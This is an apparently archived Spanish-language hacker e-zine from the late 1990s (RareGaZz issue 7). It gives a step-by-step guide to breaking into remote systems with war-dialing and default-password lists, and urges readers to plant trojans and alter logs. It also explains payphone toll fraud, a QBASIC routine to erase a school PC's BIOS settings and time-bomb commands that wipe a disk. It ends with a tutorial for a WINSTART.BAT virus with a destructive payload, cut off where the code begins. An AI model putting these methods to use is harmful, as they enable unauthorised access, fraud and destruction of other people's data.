Copy Link
Add to Bookmark
Report

RareGaZz Issue 07

eZine's profile picture
Published in 
RareGaZz
 · 30 Dec 2020

  


<<::RareGaZz::>>
"Tu inyeccion estrobonica"

oOø Numero 7 Primer a¤o øOo
~~~~~~~~~~~~~~~~~~~
Contenidos:

1. Hack,hAck,haCk,hacK
2. La nueva etica de los hackers
3. Robando a la Telefonica Espa¤ola
4. Tips para el hacker ms-dos
5. Revision de WareZ
6. Exceso Digital
7. Guia de HTML para principiantes
8. >-C0D3Z-<
9. Informacion de algunos servidores
10. Cracker de Windows 95
11. B00/\/\3r4NG
12. NotiLOONS

"RareGaZz es escrita con fines educativos y la informacion contenida
no refleja el punto de vista del editor o sus colaboradores. Se
autoriza su reproduccion total o parcial siempre y cuando se incluya
a la revista raregazz como la fuente de los datos y la direccion
(URL) completa de la pagina oficial."

http://www.geocities.com/Baja/4426
RAREGAZZ@BIGFOOT.COM

\0/ Editor \0/
| CrackSmoker |
/ \ ~~~~~~~~~~~ / \

CRACKSMOKER - KILLERBOT - LEPOMPEITOR - RARETRIP - MR.X
^^^^^^^^^^^ ^^^^^^^^^ ^^^^^^^^^^^ ^^^^^^^^ ^^^^
Esta es la nueva -y ultima- llave PGP de 2048 bits
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3

mQENAzPMAlMAAAEIAMZQzI19DkA4QyK80OIExuCrZhp840Qn33nMC1laDoMAFPdU
M/eXfxWnGb5cl0JX4UsmqYhH06w6Eh7LKN3M8uihxl7grSqyrK0kWheDpCS2gTCV
qoD8FM5sjQon/vDtc0rMy3qm9JUSKEEiN9NiAlT4Ppa5Ms5rFxT8VAxRJ6PYuh99
3jvDGhjMmKsNatv3UKiNiztfOtfP+FzO/NouPpUh38q2/OryHIgBsoGSIKJjWwHw
jhsj0PHl2cHoRsYWJhFCfAHFcQ29jiU17JFItxvZ8klEgPS/jRphpi93ICJ1pWq7
2TSZ2Y+fH4LBlRgGZ/pmkrtAahP7rjA7ZhGTxN0ABRG0KVJhcmVHYVp6IDIwNDgg
Qml0cyA8UkFSRUdBWlpAQklHRk9PVC5DT00+
=e/tl
-----END PGP PUBLIC KEY BLOCK-----

" Dejad que las ni¤as se toquen entre si "
Pervertido del D.F.,
~~~~~~~~~~~~~~~~~~~~
" Como te va en la universidad ???
muy bien ma' ... ahh, gracias por pagar la fianza "
Cracksmoker en dias recientes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<
******************************************************************************
>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<

Intro...

Esto que estan leyendo lo edite - recorte y modifique yo mero asi que las
preguntas y mentadas se las aguantan por que no les pienso decir mi e-mail
>B-) mi articulo favorito de este numero es exceso digital de NiK, y
Hack,hAck,haCk,hacK (por si querian saber).
Quizas lo mas importante que logre fue convencer a raretrip de permitirme
modificar la pagina de la revista cosa que no fue facil. La verdad se ve
casi igual pero cambie algunos nombres de archivos y puse scripts para UNIX
y LINUX como editores de logs y otras cositas.
Yo no soy bueno para estar delante de los rayos catodicos hablando con el
monitor y ademas mi compa de cuarto ya esta molestandome para que apague la
compu por que quiere dormir |-( los dejo con nada mas que un monton de ceros
y unos para su extre¤imiento y leisure ... CkSmkr

>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<
******************************************************************************
>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<

<<::RareGaZz::>>
"La resistencia es inutil"

||~"~"~"~"~"~"~"~"~"~"~"~"~||
|| Hack, hAck, haCk, hacK ||
|| ~~~~~~~~~~~~~~~~~~~~~~~ ||
*"~"~"~"~"~"~"~"~"~"~"~"~"~"*

"Parte de la informacion aqui contenida a sido sacada del excelente texto
por The Mentor. Este texto no esta tal cual lo escribio Mentor, a sido
ampliado y estudiado para adaptarlo a las necesidades especificas del texto.
La seccion sobre redes NUIS y NUAS a sido removida mientras que el paso 2
`preparacion mental' fue dejado casi intacto. Si has visto alguna de la
informacion aqui contenida ya sabes de donde salio..."
raretrip.

Ciertamente para ser hacker no existe medicamento (quiza alguna pastilla
pueda ayudar :) pero si hay un metodo a seguir y aqui en raregazz en este
numero tratare de explicarlo. Debes seguir los pasos que te voy a dar con
precision, inteligencia y mucha paciencia. Nadie se convierte en hacker de
un dia a otro obtener el conocimiento y las herramientas necesarias lleva
mucho tiempo e intentos.

PASO 1. Herramientas
""""""""""""
- Un scanner telefonico (ToneLoc y PhoneTag sirven para esto)
- Un buen cliente de comunicaciones (con distintas emulaciones como ProComm)
- Una lista de los defaults para cada sistema.
- Un scanner de direcciones I.P. (en caso de contar con conexion permanente)
- Un cliente de Telnet (con distintas emulaciones)
* emulaciones minimas: Ansi, Avatar, Prism, TTY, VT52, VT102. El programa
debe ser capaz de emular distintos baud rates (300,1200,2400,4800,9600) y
tambien debera poder cambiar de Paridad (None,Even,Odd,Space,Mark), Data
Bits (7,8) y Stop Bits (1,2).

PASO 2. Preparacion Mental
""""""""""""""""""
Debes estar preparado para fracasar en muchisimos intentos pero valdra la
pena en el momento que logres hackear tu primer sistema. Debes tener en
cuenta que estaras tratando de entrar a un sistema para conocerlo y dominarlo
unicamente mas no para da¤arlo o modificarlo. Si alguna vez te dijeron que
es mejor armonizar con la naturaleza que modificarla entonces aplica esto a
tus experiencias como hacker. Ten cuidado, no seas flojo y limpia tus huellas
antes de abandonar un sistema al que hayas entrado con la cuenta de otra
persona. Estas son las recomendaciones mas importantes:
I. No da¤es intencionalmente *ningun* sistema.
II. No alteres ningun archivo excepto los necesarios para asegurar que nadie
pueda detectarte y asegurar futuros accesos (Caballos de Troya, Alterar Logs,
y cosas asi son necesarias para sobrevivir el mayor tiempo posible dentro de
un sistema).
III. No dejes tu nombre (o el de otra persona), handle -nick- o numero
telefonico en ningun sistema.
IV. Ten cuidado con quien compartes informacion.
V. No des a conocer tu numero telefonico a nadie sin importar que tan k-rad
parezcan ser. Esto incluye SYSOPs de BBS. Si necesitas algunos datos para
ser validado consiguete una revista de ni¤os como Gasparin y busca los datos
que aparecen en algunas paginas (nombre,direccion,telefono,ciudad), tambien
puedes usar los datos que vienen en las revistas de moda donde gente busca
correspondencia con otras personas.
VI. No intentes hackear computadoras del gobierno o de la compa¤ia telefonica
si eres principiante.
VII. No uses C0D3Z (PBX's) mas de lo necesario. Si los usas por mucho tiempo
seras sorprendido. punto.
VIII. No temas a ser paranoico. Recuerda que *estas* haciendo da¤o a un
administrador. No te lastimara tener tu disco encriptado o enterrar tus
notas en el patio :-)
IX. Nunca pongas nada en BBS sobre algun sistema que estes hackeando,
tampoco uses sus sistemas de correo sin encripcion. Recuerda que el tipico
SYSOP lee todos los mensajes de su sistema en su afan de sentirse dios (es
por eso que es el sysop de un BBS).
X. No tengas miedo en preguntar. Para eso estan los hackers avanzados, no
esperes que todo sea contestado pero vale la pena intentar.
XI. Finalmente tendras que hackear, no importa lo que hagas ni cuanto tiempo
te la pases en BBS de hackers o compartas informacion con otros algun dia
tendras que realmente empezar a hacerlo. Los mejores lugares para empezar
a hackear son las universidades y colegios donde los admins son jovenes
y creen que sus sistemas son invulnerables lo que paradojicamente los hace
vulnerables.
Finalmente te recomiendo hacer un viaje a tu universidad local y pedir un
login/password para tener acceso a internet. Lo bueno de esto es que te
permiten conocer un sistema desde adentro podras explorarlo lo mas que
quieras y asi ganar experiencia en el uso de unix, linux, o en cualquiera
que sea el sistema que tengan.

PASO 3. ENCONTRAR UN SISTEMA
""""""""""""""""""""
Para encontrar una computadora conectada al telefono es necesario hacer algo
conocido como phone scanning. Phone scanning o barrido de telefonos consiste
en hacer llamadas a numeros telefonicos de forma consecutiva o al hazar para
encontrar tonos de computadora que son llamados carriers. Este metodo es
necesario para todo hacker que quiera encontrar sistemas interesantes y
desconocidos. Lo bueno de hacer esto es que nunca sabes que tipo de sistema
encontraras, puede ser el de un MacDonalds o tambien el de la gasolinera de
la esquina...
Suponiendo que los numeros en tu ciudad sean de 5 digitos algo logico y no
muy dificil de hacer es realizar una busqueda en los ultimos 3 digitos de
un principio determinado. Digamos que buscaremos desde 39000 a 39999 asi,
se tendrian que hacer 999 intentos y en ocasiones encontras numeros de Fax,
Telex, PBX's, etc. hacer esto manualmente suena estupido y lo es, por lo que
necesitaras un programa buscador de carriers -disponible en la pagina de la
revista- configurarlo y empezar a jugar. Si no quieres que tu cuenta
telefonica llegue a tu casa en cajas puedes buscar los numeros que se
encuentran en los prefijos de llamada gratuita. Aqui en Mexico todos los
numeros que comienzan en 01-800 (antes 91800) cargan el costo de la llamada
a la compa¤ia que recibe la llamada. Otra forma de hacerlo es por medio de
un PBX, si no sabes que es un pbx espera un texto sobre eso proximamente...
El mismo tipo de busqueda puede hacerse en Internet. Hay programas que buscan
sistemas determinados en direcciones IP.

PASO 4. ENCONTRE UNA COMPUTADORA, AHORA QUE??
"""""""""""""""""""""""""""""""""""""
No importa como diablos encontraste un sistema pudo ser a travez de una
red o de un scanneado telefonico, pero ahora que hacer?? Pues principalmente
llegar al prompt y de ahi hackear un login y la contrase¤a correcta. Esto
es relativamente facil a travez de la ingenieria social y muy dificil con
un ataque bruto asi que la otra alternativa son los defaults.
A continuacion una lista de los sistemas que probablemente encontraras y
los defaults que necesitaras saber.

VMS - La computadora VAX es creada por Digital Equipment Corporation (DEC)
y corre el sistema operativo VMS (virtual memory system). VMS se caracteriza
por su prompt 'Username:'. Este sistema no te dira si has entrado un login
correcto o no y te desconectara despues de tres malos intentos. Tambien
mantiene un record de todos los logins que fallaron e informa al due¤o de la
cuenta la proxima vez que entre cuantos intentos fallados se hicieron. Es
uno de los sistemas mas seguros desde fuera pero ya dentro tiene varios
errores en la seguridad. Las VAX ademas tienen uno de los mejores archivos
de ayuda de entre los demas sistemas, para accesar a esta ayuda solo escribe
HELP en el prompt.
Las cuentas defaults comunes son: [ usuario: password [,password] ]

Login Password
~~~~~ ~~~~~~~~
SYSTEM OPERATOR o MANAGER o SYSTEM o SYSLIB
OPERATOR OPERATOR
SYSTEST UETP
SYSMAINT SYSMAINT o SERVICE o DIGITAL
FIELD FIELD o SERVICE
GUEST GUEST o sin password
DEMO DEMO o sin password
DECNET DECNET

DEC-10 - Esta es el equipo de computo mas nuevo que existe dentro de la
linea de DEC's. Operan el sistema operativo TOPS-10. Este tipo de maquinas
se reconocen por el prompt "." Las series DEC-10/20 son amables con los
hackers permitiendo varios intentos en el login prompt sin guardar un log
de los intentos fallados. Las cuentas estan en forma [xxx,yyy]. Lo mejor
de este sistema es la posibilidad de obtener informacion sobre las personas
en linea antes de entrar a el usando el comando systat. Si ves una cuenta
que lea [234,1001] BOB JONES, seria inteligente probar como password BOB,
JONES, BOBBY, etc. Para entrar al sistema se usa el comando:
login xxx,yyy [enter]
password:
Este sistema como antes lo habia dicho, permite intentos sin limite y ademas
te avisa si el login que estas usando existe.
Las cuentas defaults comunes son:

Login Password
~~~~~ ~~~~~~~~
1,2 SYSLIB o OPERATOR o MANAGER
2,7 MAINTAIN
5,30 GAMES

UNIX - Este sistema ya a sido ampliamente revisado en los numeros
anteriores de este zine, de hecho tenemos publicada una lista de cuentas
defaults que reproducire del numero pasado:

ÚÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄ¿ÚÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄ¿
³ Default ³ Password ³³ Default ³ Password ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄ´ÃÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄ´
³decnet ³ddennet ³³guest ³friend ³
³field ³service ³³guest ³welcome ³
³system ³manager ³³default ³user ³
³decnet ³nonpriv ³³field ³digital ³
³field ³test ³³netnonpriv ³nonpriv ³
³postmaster ³mail ³³sysmaint ³service ³
³sysmaint ³digital ³³system ³operator ³
³system ³manager ³³system ³syslib ³
³system ³uetp ³³systest_clig³systest ³
³userp ³user ³³sysadmin ³admin ³
³daemon ³daemon ³³sysbin ³sysbin ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÙÀÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÙ

PRIME - Esta computadora opera con el sistema operativo Primos. Son faciles
de detectar ya que lo reciben a uno con el mensaje "Primecon xx.xx.xx" o
algo parecido dependiendo de la version que te encuentres. Usualmente no
ofrecen ningun prompt asi que debes escribir "login <usuario>". Si la version
es anterior a la 18.00.00 puedes presionar un monton de caracteres de escape
o CTRL-C y entraras. Este sistema ofrece la capacidad de conectarte a los
NUAS de todo el mundo con el comando NETLINK...sintax: nc <nua>
Las cuentas defaults comunes son:

Login Password
~~~~~ ~~~~~~~~
PRIME PRIME o PRIMOS
PRIMOS_CS PRIME o PRIMOS
PRIMENET PRIMENET
SYSTEM SYSTEM
NETLINK NETLINK
TEST TEST o PRIME o PRIMOS
GUEST GUEST o PRIME
GUEST1 GUEST

HP-x000 - Este sistema es elaborado por Hewlett-Packard. Se caracteriza por
el prompt ":". La secuencia de entrada a este sistema es una de las mas
complicadas debes escribir:
"HELLO SESSION NOMBRE,USUARIO,NOMBRE-DE-CUENTA,GRUPO"
Afortunadamente algunos de esos campos pueden dejarse en blanco. En ocasiones
todos los campos estan protegidos con passwords por lo que este sistema no
es uno de los mas faciles de accesar.
Las cuentas defaults comunes son:

Login USER
~~~~~ ~~~~
MGR.TELESUP,PUB MGR
Acct: HPONLYG rp: PUB
MGR.HPOFFICE,PUB
FIELD.SUPPORT,PUB FLD,
MAIL.TELESUP,PUB MAIL,
MGR.RJE
FIELD.HPP189 ,HPP187,HPP189,HPP196
MGR.TELESUP,PUB,HPONLY,HP3

IRIS - Iris significa (interactive real time information system).
Originalmente corria en PDP-11's, pero ahora corre en otras minis. Para
identificar uno de estos sistemas busca el texto "Welcome to `IRIS' R9.1.4
Timesharing" y el prompt ACCOUNT ID? (algunas veces es cambiado). IRIS no
tiene limites a la hora de hackear una cuenta y no guarda un log de los
intentos fallados. (si alguien conoce defaults pueden enviarlos :)

VM/CMS - Este sistema es ejecutado en las super computadoras de IBM
(International Business Machines) llamadas mainframes. Una vez conectado
a una de estas computadoras te mostrara un mensaje asi "VM/370 ONLINE",
y te dara un prompt "." justo como la TOPS-10 lo hace. Para entrar debes
ejecutar: LOGON <usuario>
Las cuentas defaults comunes son:

Login Password
~~~~~ ~~~~~~~~
AUTOLOG1 AUTOLOG o AUTOLOG1
CMS CMS
CMSBATCH CMS o CMSBATCH
EREP EREP
MAINT MAINT o MAINTAIN
OPERATNS OPERATNS o OPERATOR
OPERATOR OPERATOR
RSCS RSCS
SMART SMART ???
SNA SNA
VMTEST VMTEST
VMUTIL VMUTIL
VTAM VTAM

NOS - NOS significa Networking Operating System y corre en la Cyber
computadora hecha por Control Data Corp. A este sistema lo puedes identificar
facilmente por la bienvenida "WELCOME TO THE NOS SOFTWARE SYSTEM...". El
primer prompt que recibiras sera FAMILY: (presiona enter) depues llegaras
a otro prompt USER NAME: donde cada uno es de 7 digitos alfanumericos y
son dependientes del sistema por lo que no son palabras o frases conocidas.

Decserver - Las DECs son una serie de computadoras conectadas entre si
para formar una sola unidad de procesamiento, la funcionalidad de estos
sistemas es altamente utilizado por los hackers para quebrar passwords de
cuentas unix por la rapidez del sistema. El prompt usualmente sera:
"Enter Username>" aunque yo he visto otros prompts en estos sistemas. El
nombre de usuario puede ser cualquier cosa, lo mejor sera presionar algo
nada sospechoso como `c' o algun numero. De ahi te presentara con el prompt
`local>'. De ahi debes ejecutar `c <sistema>' para conectarte. Para obtener
una lista de sistemas conectados ejecuta `sh' `services' o `sh nodes'. En
algunos sistemas DEC'S existen comandos como MODEM o DIAL que permiten
hacer uso de un modem para llamadas externas que te permitiran marcar a BBS
internacionales a expensas de la compa¤ia que opera el DEC.

SISTEMAS QUE NO RESPONDEN
~~~~~~~~~~~~~~~~~~~~~~~~~
Casi siempre que hagas un `barrido de telefonos' encontraras sistemas que
no ofrecen prompts de ningun tipo dando un sentimiento de frustracion a todo
hacker wannabe. Recuerda que algunas veces puede tratarse de Telex, Fax o
algun otro tipo de carrier asi que asegurate del tono que recibes. Para hacer
que *algo* pase sigue las siguientes instrucciones...

Deberas probar todas las posibilidades usando diferentes configuraciones en
tu programa de comunicaciones juega con la paridad, baud rate (usualmente
todos contestan a 300bps), y stop bits. Algunos sistemas como seguridad
unicamente ofrecen conexiones a velocidades de 600 o 1100 bits asi que
asegurate de intentar todas. Envia Enters, Hard Breaks (todo programa de
comunicacion lo hace) y distintas combinaciones de ambos. Prueba escribiendo
puntos o palabras como LOGIN, LOGON, ETC. Envia caracteres de control como
CTRL + A..Z
Lo mas importante es los tipos de terminales, si empiezas a recibir basura
en tu programa de comunicaciones cambia tu terminal. Generalmente lo tenemos
en ANSI pero a la hora de hackear yo recomendaria vt-100 o alguna otra como
AVATAR o PRISM.

Si haciendo lo anterior no has podido entrar probablemente sea necesario un
software proporcionado por la compa¤ia due¤a del sistema como lo hace
McDonald's y Gigante (Mexico). Si el numero telefonico que quieres penetrar
es 100 intentar marcar via voz a 101 o 99 y usando ingenieria social obten
informacion necesaria para lograr tu objetivo.

>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<
******************************************************************************
>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<

ETICA DE LOS HACKERS PARA LOS 90'S

Las primeras generaciones de hackers crearon sus propias reglas de conducta
que con el paso del tiempo han quedado obsoletas. En este texto se muestran
las reglas de conducta y objetivos de los hackers de 1958 y su equivalente
con la etica actual.

1958 - TODA LA INFORMACION DEBE SER LIBRE

1997 - EL ACCESO A LA INFORMACION SOBRE LA TECNOLOGIA DEBE SER GRATIS

"Es estupido y ridiculo pensar que las compa¤ias e individuos deben
proporcionar sus productos gratis."
Probablemente los primeros hackers se referian con esta sentencia a
proporcionar el codigo fuente de algun programa a la comunidad o tal
vez se referian a la informacion sobre carriers o logins para sistemas
pero dudo mucho que se refirieran a la informacion que actualmente se
vende como software o publicaciones electronicas como el New York Times.
El unico heroe que existiria si esta sentencia debiera ser seguida al
pie de la letra seria el "WaReZ DuDe" que proporciona acceso gratuito
al codigo comercial de alguna compa¤ia.

Una diferente interpretacion seria: "El acceso a las computadoras y a
la tecnologia necesaria para accesar a la informacion debe ser gratis.
Las escuelas y librerias publicas deben ser equipadas con computadoras
y acceso a internet en cantidades adecuadas para permitir a aquellos
sin los medios ser parte de la revolucion de las computadoras. Este
acceso deber ser ilimitado y no estar restringido, los individuos deben
tener acceso a la libertad de elegir que informacion desean obtener.
La prohibicion de cualquier tipo de informacion (pornografia,bombas,etc)
solo fomenta el deseo de obtenerla a como de lugar."

2. 1958 - ACCESO A LAS COMPUTADORAS -- Y TODO LO QUE PUEDA ENSE¥ARTE ALGO
SOBRE COMO FUNCIONA EL MUNDO -- DEBE SER ILIMITADO Y TOTAL.

1997 - TECNOLOGIA PARA LAS MASAS DEBE SER BARATA.
TECNOLOGIA DESCARTADA DEBE SER GRATIS!

La idea de los primeros hackers era bastante buena pero hoy en dia parece
una utopia el lugar donde las computadoras sean gratuitas. A falta de
mentes brillantes que logren esto muchos se han conformado con pedir el
acceso a la tecnologia que a pasado de moda gratis. Es una forma de
equipar escuelas con computadoras. El problema es que la mayoria de las
compa¤ias prefieren tirarlas que gastar dinero en el tramite que lleva el
donar computadoras.
"Los hackers de los 70's como Bill Gates se han vendido a los BMW y
Corvettes en lugar de hacer la tecnologia gratuita o por lo menos barata
a las masas."

3. 1958 - DESCONFIA DE LA AUTORIDAD -- PROMUEVE LA DESCENTRALIZACION

1997 - DESCONFIA DE TODOS -- PROMUEVE UN GOBIERNO DESCENTRALIZADO

Los hackers de hoy en dia nos enfrentamos a muchos mas problemas y
enemigos que aquellos que empezaron. Para empezar nosotros burlamos
la seguridad de las compa¤ias telefonicas, hacemos a otros hackers
celosos y la policia cuenta con hackers traidores.

4. 1958 - LOS HACKERS DEBEN SER JUZGADOS POR SUS HACKS, NO POR CRITERIOS
ESTUPIDOS COMO SEXO, RAZA, EDAD O POSICION SOCIAL.

1997 - LOS HACKERS DEBEN SER JUZGADOS POR SUS HACKS. PUNTO.

Los hackers que forman parte de la sociedad conviven con hackers de
distintas culturas, colores, sexos y preferencias sexuales :) Negar
a un tipo de hacker especifico es negar a la sociedad misma.

5. 1958 - TU PUEDES CREAR ARTE Y BELLEZA EN UNA COMPUTADORA

1997 - TU PUEDES ELEGIR ENTRE CREAR BELLEZA O CAOS EN UNA COMPUTADORA,
LA DECISION ES TUYA.

Esta se explica por si sola. Asi como todo en la vida - puedes elegir
entre usar tus talentos para bien o mal. Ultimadamente, la decision
es tuya.

>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<
******************************************************************************
>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<

PhuCk1nG a la 73l3F0n1C4
~~~~~~~~~~~~~~~~~~~~~~~~
Si quieres hacer llamadas gratis desde los telefonos publicos de la
telefonica espa¤ola desde telefonos como el que se muestra en el diagrama
sigue las indicaciones . . .

Primero necesitas encontrar un telefono de la Telefonica que tenga el
enchufe al alcance y donde no llame mucho la atencion ya que necesitaras
desconectarlo brevemente. Si encuentras este tipo de telefonos preparaos
para hacer llamadas gratis nacionales e internacionales.

___________Hoyo_____
/ \
| ----- |
| /-\ | | |
| \_/ ----- |
| [|] mf ? |
| [|] 1 2 3 |
| [|] 4 5 6 |
| [|] 7 8 9 |
| /-\ * 0 # |
| \-/ _______ |
| | | |
| |_______| |
|--------------------|
\____________________/
|Plug!|
|_____|

Inserta una moneda de 25 pesetas en el telefono (el slot largo de 25 pesetas
no en el peque¤o). Despues, presiona el audicular nueve decimas hacia abajo
hasta que sientas un poco de resistencia. Si tu moneda es devuelta lo has
hecho mal, pero si la pantalla comienza a flashear lo hiciste correctamente.

Ahora seria bueno poner una tarjeta sobre la pantalla con algun numero
apuntado (para disimular) por si alguien pasa por el telefono no vea la
pantalla flasheando.

Una vez hecho esto, marca "003". Cuando se conecte escucharas una grabacion
en espa¤ol y rapidamente desconecta y conecta el telefono. Ahora escucharas
un tono parejo y todo lo que teneis que hacer es marcar el boton "mf" que
sirve para hacer otra llamada cuando hayas colgado. Una ves que marques el
boton "mf" eres libre para llamar a cualquier parte del mundo!

Si terminaste de llamar presiona "mf" de nuevo para hacer otra llamada.
Cuando cuelgues probablemente recibiras tu peseta.

>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<
******************************************************************************
>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<

"TIPS PARA EL HACKER DE MS-DOS"
Primera parte por YO
~~~~~~~~~~~~~~~~~~~~
Este texto va dirigido a los estudiantes de los colegios que tengan
laboratorio de computacion donde usen windows y DOS (en los colegios
nunca te van a ense¤ar unix puesto que la mayoria de ellos, usan ese
sistema para facilitar la entrada de notas a los profesores), o
cualquier persona en general...

PROFE MALO :

El profe desactivo la disquetera desde el SETUP y le ha puesto clave, no
es problema solo tienes que hacer este programa con el QBASIC :

FOR I=34 TO 65535
OUT I,34
NEXT I

Y listo.. este programa, borra el setup completo y solo tienes que detectar
el disco duro, etc...
Nota : Este programa lo he probado en el Lab de Comp de mi colegio y en mi
casa, no se si sirva en todos los PC, y tampoco si produce algun da¤o...

ESCONDIENDO DIRECTORIOS :

Esto sirve para esconder cosas XXX, archivos importantes, o programas del
profesor de comp.
Lo que tienes que hacer es crear un directorio con caracteres especiales
ASCII (·ñõ) y le haces un "ATRIBB nombre_directorio +h +r +s -a".
[ caracter recomendado: ALT + 255 ]
Esto funciona en DOS y en windows, porque al poner attribb solo, este muestra
solo los archivos, no los directorios y para poder entrar debe poner el
nombre del directorio que va a hacer casi imposible entar por los caracteres
ASCII, deben estar pensando que windows puede, pues no, porque por tener
caracteres especiales, windows dice que no existe o no tiene nada, ya que
windows cambia esos caracteres, el archivos se vera con otro nombre y
no se podra borrar, pero para entar a ese directorio, ustedes deben hacer
un archivo por lotes que sustituya el directorio por una unidad con la
utilidad SUBST :

@ECHO OFF
SUBST unidad_nueva: unidad:nombre_directorio
unidad_nueva:

[ Si nuestro directorio se llama C:\(ALT+255) se haria asi:
SUBST F: C:\(ALT+255) <-- ENTER
F: <-- ENTER
donde F: es el dir con los programas que quieras esconder.
Para deletear el nuevo escribe esto:
SUBST /D F: ]

Asi podran grabar cualquier programa al computador sin que el profe se de
cuenta...

En el archivo ZIP incluido con esta revista viene un programa TSR que hace
que algunas aplicaciones se ejecuten a una hora determinada, sirve para una
buena broma a algun amigo o profesor que sepa poco...
Ej: delay /t15:30 /fdeltree /y *.*
(no lo hagan es un ejemplo da¤ino)
[ La computadora no debera ser apagada hasta que llegue la hora ]

"TIPS PARA EL HACKER DE MS-DOS"
Segunda parte por mr.x
~~~~~~~~~~~~~~~~~~~~~~

yo nomas les voy a ense¤ar a usar la utileria RDEL.COM (incluida en el
archivo UTILS.ZIP) que me parece bastante divertida. Este archivo lo consegui
como codigo fuente en una revista impresa mexicana.

primero veamos una estructura ms-dos ejemplo:

|---DOS
| |---SYSTEM
C:\-|---WINDOWS---|
|---TEMP
|
|---FONTS

supongamos que quisieramos borrar todos los archivos que tengan extension
.tmp y que esten en el directorio windows y los que siguen pero sin borrar
los archivos .tmp de otros directorios. usualmente hariamos:

C:
CD\WINDOWS
DEL *.TMP
CD\WINDOWS\SYSTEM
DEL *.TMP
CD\WINDOWS\TEMP
DEL *.TMP
CD\WINDOWS\FONTS
DEL *.TMP

pero casi siempre el directorio windows tiene varios subdirectorios lo que
hace a este metodo cansado y lento. veamos como se haria con RDEL.COM :

C:
CD\WINDOWS
RDEL *.TMP

Al usar la " \ " en este comando borra los archivos que le digamos de TODOS
los subdirectorios del directorio principal. Como ultimo ejemplo benigno
seria borrar todos los FILE_ID.DIZ del disco duro:

RDEL \FILE_ID.DIZ

si queremos borrar todos los archivos del disco (de otra persona claro) sin
necesidad de que aparesca Y/N usamos el programa asi:

RDEL \*.*

si usamos la utilidad de YO y la unimos a esta tendremos una bomba de tiempo
bastante efectiva. ! tienes que poner a rdel.com en el path para que el
comando pueda ser ejecutado desde cualquier directorio !

[ ¨ que es el path ?
cuando ejecutas un programa como FORMAT.COM o WIN.COM lo puedes hacer sin
importar en que directorio o drive estas por que el programa esta en el
path. para saber cual es el path (o directorios en los que puedes guardar
archivos para ser ejecutados desde cualquier parte) escribe en el prompt
PATH y da un enter. si copias un programa a un directorio que este en el
path se ejecutara desde cualquier subdirectorio o drive. La linea path se
puede definir desde el AUTOEXEC.BAT poniendo una linea mas o menos asi en
el archivo: PATH=C:\DOS;C:\PGP;C:\WINDOWS;C:\XXX;C:\LOQUESEA;
los directorios estan divididos por " ; " (punto y coma) para que sean
reconocidos como variables del sistema. CkSmkr ]


"TIPS PARA EL HACKER DE MS-DOS"
Tercera parte por raretrip para RareGaZz
-bye bye virii-

Despues de haber leido y entendido esta parte ustedes podran crear sus
propios VIRUS basados en MSDOS!! Para hacerlo no necesitan conocimientos
previos de programacion ni cosas de esa especie. Lo unico que necesitan
conocer son algunos comandos BATCH y features de sistemas como windows.
Puedes modificar este virus tanto como quieras para adaptarlo a diferentes
sistemas y niveles de venganza!

BASE DEL VIRUS
El virus se basa en el feature de todas las versiones windows de ejecutar
el archivo WINSTART.BAT si lo encuentra en C:\WINDOWS antes de iniciar el
sistema por completo. Recuerda que todas las versiones de windows se ven
afectadas.
Lo que hace el virus es simplemente buscar el archivo userz1.dat en el
directorio c:\windows si lo encuentra simplemente devuelve el control a
windows y todo sigue normal. En caso de no encontrar el archivo userz1.dat
en el directorio comienza el conteo...washington, we got a problem!
En el codigo original del programa solamente espera que se inicie windows
8 veces para ejecutar el programa que tu quieras pero eso puedes modificarlo.
Cuando se borra el userz1.dat se crean archivos 'temporales' que serviran
de contador del virus; revisando el codigo entenderas su funcion.

Cuando se instala el programa revisa si existe el c:\windows\winstart.bat
si lo encuentra lo copia a c:\windows\after.bat y pone unicamente en el
c:\windows\winstart.bat el comando CHKSYS una vez ejecutado chksys al
finalizar correra c:\windows\after.bat y regresara el control a windows.
En total, la instalacion necesita copiar los archivos
- chksys.bat
- sysinis.ini
- bakbmb.ini
al directorio c:\windows para el buen funcionamiento del virus y copiar
el archivo execute.dat a c:\windows\winstart.bat que contiene el comando
chksys
[ se refiere al virus incluido en el archivo virii.zip pero tu virus bien
podria copiar los archivos chksys.bat, sysinis.ini y bakbmb.ini al dir
de windows y agregar la linea CHKSYS al winstart.bat ]

PAYLOAD
El virus necesita los archivos c:\windows\sysinis.ini y c:\windows\bakbmb.ini
pues esos son los programas que ejecutara cuando la pc con windows se inicie
8 veces *despues* de haberse eliminado userz1.dat
El codigo que viene en la revista incluye un troya con una grafica malisima
(sysinis.ini) y el puro troya en caso de fallar el otro (bakbmb.ini). Algun
otro tipo de kaoz seria copiar un virus a uno de los dos archivos ya que
no es necesario que los dos esten presentes.

CODIGO BASE
Las lineas que empiecen con ~@~ son comentarios por si acaso quieres
modificar el codigo y eliminar la necesidad de borrar el userz1.dat para
que empieze el conteo.

----------Comienza bye bye virii por raregazz-----CHKSYS.BAT------------------
